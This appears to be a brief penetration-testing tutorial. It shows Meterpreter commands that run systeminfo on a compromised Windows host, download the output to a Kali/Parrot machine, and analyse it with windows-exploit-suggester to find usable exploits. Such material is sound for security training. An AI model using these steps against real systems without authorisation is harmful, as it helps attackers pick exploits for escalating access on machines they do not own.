This script is to find out about available exploits in Windows.

Execution

1. Gather system information from meterpreter.

execute -f => to run cmd commands

cmd.exe /c systeminfo => open cmd and execute the command systeminfo

>> systeminfo.txt => create a file and append the output to it

  • execute -f “cmd.exe /c systeminfo >> systeminfo.txt”

2. Download the file systeminfo.txt we just created into Kali/Parrot Linux.

  • download systeminfo.txt

Now we have system info to work with

3. Download, update, and install required libraries to run the script.

In my environment I had to install xlrd (pip install xlrd & pip install xlrd –upgrade)

4. Analyze the systeminfo.txt file we downloaded from the host with windows-exploit-suggester

  • ./windows-exploit-suggester.py –database 2019-010-26-mssb.xlsx –systeminfo systeminfo.txt